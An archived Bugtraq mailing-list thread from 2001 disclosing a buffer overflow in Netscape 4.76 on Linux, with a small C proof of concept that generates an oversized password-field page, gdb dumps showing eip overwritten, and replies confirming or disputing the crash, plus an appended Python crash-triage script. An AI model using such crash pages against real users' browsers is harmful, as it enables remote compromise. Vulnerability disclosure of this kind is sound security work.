5964620 2001-01-16 00:19 -0500 /185 lines/ fish stiqz <fish@ANALOG.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-01-16 20:56 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: fish@ANALOG.ORG
Recipient: Bugtraq (import) <14842>
Subject: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116001943.A24465@analog.org>

Hello.

I have noticed that the buffer overflow discovered by Michal Zalewski and
covered extensively by the different unix distributions is still present in
netscape 4.76 even though they claim it is not. Refer to these links for
background information:

http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html

All of the above advisories (and all that I've seen) state that netscape
versions up to and including 4.75 are vulnerable, not 4.76. I have caused
netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
Below is the proof of the pudding:

On slackware-current (netscape.tgz):

$ ./nutscrape 20000 > crash_me.html
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ gdb /usr/bin/netscape
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) set args http://fish.analog.org/~fish/crash_me.html
(gdb) run
Starting program: /usr/bin/netscape http://fish.analog.org/~fish/crash_me.html
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax            0x41414141       1094795585
ecx            0xbfffd904       -1073751804
edx            0x91c1c00        152837120
ebx            0x175a2c         1530412
esp            0xbfffd83c       0xbfffd83c
ebp            0xbfffd864       0xbfffd864
esi            0x0              0
edi            0x921eb8c        153217932
eip            0x41414141       0x41414141
eflags         0x10246          66118
<snip>

On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):

$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ rpm -qa |grep netscape
netscape-communicator-4.76-0.6.2
netscape-common-4.76-0.6.2
$ gdb /usr/lib/netscape/netscape-communicator
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run http://fish.analog.org/~fish/crash_me.html
Starting program: /usr/lib/netscape/netscape-communicator http://fish.analog.org/~fish/crash_me.html

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()Cannot access memory at address 0x7f0000
(gdb) info all-registers
eax            0x41414141       1094795585
ecx            0xbfffdd14       -1073750764
edx            0x9268200        153518592
ebx            0x40064a2c       1074154028
esp            0xbfffdc4c       -1073750964
ebp            0xbfffdc74       -1073750924
esi            0x0              0
edi            0x92624ec        153494764
eip            0x41414141       1094795585
eflags         0x10246          66118
<snip>

So we see here that our eip is now 0x41414141. This is obviously bad.
Windows versions seem to not be vulnerable, although I have only tested
this on versions 4.08 and 4.61.

If this vulnerability is exploited, an attacker could gain entrance to
potentially any computer running vulnerable versions of netscape that
visits his website.

To test if you are vulnerable, point your browser to
http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or
http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's)

My Findings: (you may have to hit reload before the browser will crash):

Number of A's | Result
-------------------------------------------------------
1000          | Nothing.
2000          | Nothing.
5000          | Memory corruption (check view source and you may see this)
7000          | Continued corruption.
10000         | SIGSEGV in PR_HashTableRawLookup ()
15000         | SIGSEGV in _MD_GetArchitecture ()
>= 20000      | SIGSEGV in XFE_GetFormElementInfo ()
              | And, sometimes eip overwrite.
-------------------------------------------------------

nutscrape.c is a very trivial program that generates a big html form value
in an input field, which causes the overflow.

/*
 * nutscrape.c - fish stiqz <fish@analog.org>
 * Trivial overflow in netscape.
 */
#include <stdio.h>
#include <stdlib.h>

#define OVERFLOW_BYTE 0x41   /* 'A': the byte repeated in the form value */

void usage(char *p)
{
    fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
    exit(EXIT_FAILURE);
}

int main(int argc, char **argv)
{
    int i, t;

    if(argc != 2)
        usage(argv[0]);

    /* number of OVERFLOW_BYTEs to place in the password field's value */
    t = atoi(argv[1]);

    printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
           "</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
           "<input type=password value=");
    for(i = 0; i < t; i++)
        putc(OVERFLOW_BYTE, stdout);
    printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");

    return EXIT_SUCCESS;
}

So, in summary, If you upgraded to netscape 4.76 to fix the buffer overflow
problem, then you upgraded in vain, the problem most definitely still
exists.

Hope you all have a good day.

- fish stiqz

shoutouts to nerile. #TelcoNinjas suck.

--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org>        <*)))-<      ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
(5964620) --------------------------------(Re-wrapped)
Comment in text 5965279 by Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Comment in text 5965320 by Frank v Waveren <fvw@VAR.CX>

5965279 2001-01-16 19:08 +0100 /23 lines/ Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Sent by: joel@lysator.liu.se
Imported: 2001-01-17 01:22 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: sziszi@PETRA.HOS.U-SZEGED.HU
Recipient: Bugtraq (import) <14845>
Comment on text 5964620 by fish stiqz <fish@ANALOG.ORG>
Subject: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116190857.A21411@petra.hos.u-szeged.hu>

Hello everybody,

Crash was reproduced here also with Communicator for Linux ver 4.76.
Netscape 4.7 on Win95 did not crash.
IE on WinME was not affected.

But some good news to users of non-MS platforms: Mozilla as built from CVS
today DID NOT crash on FreeBSD 5.0-CURRENT with either page no matter how
many times I reloaded. This may mean also that NS 6 is not affected but
this was not tested.

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary
(5965279) --------------------------------(Re-wrapped)

5965320 2001-01-16 18:54 +0100 /30 lines/ Frank v Waveren <fvw@VAR.CX>
Sent by: joel@lysator.liu.se
Imported: 2001-01-17 02:06 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: fvw@VAR.CX
Recipient: Bugtraq (import) <14851>
Comment on text 5964620 by fish stiqz <fish@ANALOG.ORG>
Subject: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: Frank v Waveren <fvw@VAR.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116185410.A4044@var.cx>

On Tue, Jan 16, 2001 at 12:19:43AM -0500, fish stiqz wrote:
> All of the above advisories (and all that I've seen) state that netscape
> versions up to and including 4.75 are vulnerable, not 4.76. I have
> caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
> Below is the proof of the pudding:

No dice, apart from a slight rendering bug if you go to the end of the
password field, it doesn't appear to have any problems here.

[/home/fvw] netscape -v
Netscape Lite 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
[/home/fvw] rpm -qi netscape-navigator
Name        : netscape-navigator           Relocations: /usr
Version     : 4.76                              Vendor: Red Hat, Inc.
Release     : 0.6.2                         Build Date: Mon Nov 13 18:47:54 2000
Size        : 7690589                          License: Commercial
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary     : The Netscape Navigator Web browser.
--
Frank v Waveren                                        Fingerprint: 0EDB 8787
fvw@[var.cx|dse.nl|stack.nl|chello.nl] ICQ#10074100    09B9 6EF5 6425 B855
Public key: http://www.var.cx/pubkey/fvw@var.cx-gpg    7179 3036 E136 B85D
(5965320) ------------------------------------------
Comment in text 5965210 by fish stiqz <fish@ANALOG.ORG>

5965210 2001-01-16 14:40 -0500 /117 lines/ fish stiqz <fish@ANALOG.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-01-17 00:31 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: fish@ANALOG.ORG
Recipient: Bugtraq (import) <14843>
Comment on text 5965320 by Frank v Waveren <fvw@VAR.CX>
Sent: 2001-01-17 02:06
Subject: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116144003.A3027@analog.org>

Frank v Waveren <fvw@var.cx> wrote:
> No dice, apart from a slight rendering bug if you go to the end of the
> password field, it doesn't appear to have any problems here.
>
> [/home/fvw] netscape -v
> Netscape Lite 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
> [/home/fvw] rpm -qi netscape-navigator
> Name        : netscape-navigator           Relocations: /usr
> Version     : 4.76                              Vendor: Red Hat, Inc.
> Release     : 0.6.2                         Build Date: Mon Nov 13 18:47:54 2000
> Size        : 7690589                          License: Commercial
> Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
> Summary     : The Netscape Navigator Web browser.

The dice is rolling over here. This is the exact rpm from the redhat update
ftp site.
The md5sum matches the one listed on their website (see below), and it
crashes with the pages I listed on the original post:
-> http://fish.analog.org/~fish/crash_netscape2.html

$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
$ md5sum netscape-navigator-4.76-0.6.2.i386.rpm
670b08cbad1097f4ca923071c202b5dd  netscape-navigator-4.76-0.6.2.i386.rpm

- Same rpm listed at http://www.redhat.com/support/errata/RHSA-2000-109.html:
670b08cbad1097f4ca923071c202b5dd 6.2/i386/netscape-navigator-4.76-0.6.2.i386.rpm

$ rpm -qi netscape-navigator
Name        : netscape-navigator           Relocations: /usr
Version     : 4.76                              Vendor: Red Hat, Inc.
Release     : 0.6.2                         Build Date: Mon 13 Nov 2000 12:47:54 PM EST
Install date: Tue 16 Jan 2001 01:45:38 PM EST      Build Host: porky.devel.redhat.com
Group       : Applications/Internet         Source RPM: netscape-4.76-0.6.2.src.rpm
Size        : 7690589                          License: Commercial
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary     : The Netscape Navigator Web browser.
Description :
Netscape Navigator is the industry-leading Web browser. It supports the
latest HTML standards, Java, JavaScript and some style sheets.

Information on the Netscape Navigator license may be found in the file
/usr/doc/netscape-common-%{version}/LICENSE.

This will install the basic Netscape Navigator Web browser. If you want
additional features, such as the Usenet news reader and HTML editor, you
should install the netscape-communicator package.

- This is the same version you are using! It definitely crashes for me,
(see below).

$ rpm -qf /usr/lib/netscape/netscape-navigator
netscape-navigator-4.76-0.6.2
$ gdb /usr/lib/netscape/netscape-navigator
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) set args http://fish.analog.org/~fish/crash_netscape2.html
(gdb) run
Starting program: /usr/lib/netscape/netscape-navigator http://fish.analog.org/~fish/crash_netscape2.html

Program received signal SIGSEGV, Segmentation fault.
0x4002c4d3 in XtCallCallbackList () from /usr/X11R6/lib/libXt.so.6
(gdb) info all-registers
eax            0x40063bc4       1074150340
ecx            0x41414141       1094795585
edx            0x186a0          100000
ebx            0x40065a2c       1074158124
esp            0xbfffdab4       -1073751372
ebp            0xbfffdac8       -1073751352
esi            0xbfffdb90       -1073751152
edi            0x41414145       1094795589
eip            0x4002c4d3       1073923283
eflags         0x10202          66050
<snip>

I have also gotten this to crash on the latest debian-unstable.

$ dpkg --print-avail netscape
Package: netscape
Priority: optional
Section: contrib/web
Installed-Size: 22
Maintainer: Ryan Murray <rmurray@debian.org>
Architecture: i386
Source: netscape4.base
Version: 1:4.76-1
Depends: communicator | navigator

Exactly what did you do that it didn't segfault on you? In all my tests
Netscape has died either as soon as the page loads or as soon as you try to
go somewhere else (or reload).

--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org>        <*)))-<      ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
(5965210) --------------------------------(Re-wrapped)
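Crash triage over the register dumps quoted in this thread, as an added example that is not part of any of the posts: it parses `info all-registers` text and reports whether the fill byte from the PoC has reached the instruction pointer (the Slackware and Red Hat Communicator crashes) or only data registers (the Navigator crash inside libXt). The sample dumps are constructed from the values above; `FILL_BYTE`, the 4-byte tolerance and the function names are the example's own assumptions.

```python
import re

# The byte the thread's PoC repeats ('A'); an assumption of this example.
FILL_BYTE = 0x41

# Matches "name 0xhex" pairs as printed by gdb's `info all-registers` on x86.
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip|eflags)\s+0x([0-9a-fA-F]+)")


def parse_registers(dump: str) -> dict:
    """Return {register: value} for the x86 registers found in a gdb dump."""
    return {name: int(hexval, 16) for name, hexval in REG_RE.findall(dump)}


def tainted_by_fill(value: int, fill: int = FILL_BYTE, tolerance: int = 4) -> bool:
    """True if every byte of the 32-bit value lies within `tolerance` of the fill
    byte. A small offset still counts: edi 0x41414145 in the Navigator dump is the
    fill pattern plus 4, consistent with a pointer advanced through the fill bytes."""
    return all(abs(((value >> shift) & 0xFF) - fill) <= tolerance
               for shift in (0, 8, 16, 24))


def classify_crash(dump: str) -> dict:
    """Rank a crash: fill pattern in eip (control-flow hijack) beats fill pattern
    in data registers (memory corruption only) beats no pattern at all."""
    regs = parse_registers(dump)
    tainted = sorted(r for r, v in regs.items()
                     if r != "eflags" and tainted_by_fill(v))
    if "eip" in tainted:
        verdict = "control-flow hijack: eip overwritten with fill pattern"
    elif tainted:
        verdict = "data corruption: fill pattern in " + ", ".join(tainted)
    else:
        verdict = "no fill pattern in registers"
    return {"tainted": tainted, "verdict": verdict}


# Constructed from the dumps in the thread, abridged to the relevant registers.
SLACKWARE_DUMP = ("eax 0x41414141 1094795585 ecx 0xbfffd904 -1073751804 "
                  "eip 0x41414141 0x41414141 eflags 0x10246 66118")
NAVIGATOR_DUMP = ("eax 0x40063bc4 1074150340 ecx 0x41414141 1094795585 "
                  "edi 0x41414145 1094795589 eip 0x4002c4d3 1073923283")

if __name__ == "__main__":
    for label, dump in (("slackware", SLACKWARE_DUMP), ("navigator", NAVIGATOR_DUMP)):
        print(label, classify_crash(dump)["verdict"])
```

The same ranking is what separates the table rows above that end in "SIGSEGV in some function" from the ">= 20000" row's "sometimes eip overwrite": only the latter has the fill byte in eip.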